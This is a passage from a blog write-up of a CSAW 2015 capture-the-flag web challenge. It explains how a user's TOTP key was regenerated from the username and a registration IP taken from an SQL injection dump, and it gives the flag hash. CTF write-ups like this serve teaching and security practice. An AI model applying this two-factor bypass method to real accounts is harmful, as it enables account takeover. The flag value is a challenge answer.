The TOTP is not stored server-side: it is generated at runtime using a seed based on the username and his registration IP address. We had the user IP address from the SQLi dump and we can now use the get_otp_key() function to generate his TOTP key:
The flag is the md5($totpkey.$password): a8815ecd3c2b6d8e2e884e5eb6916900

Posted by Bernardo Rodrigues at 7:30 PM. 1 comment. Labels: csaw-2015, ctf, lfi, sqlinjection, web

About me: Bernardo Rodrigues (Twitter @bernardomr)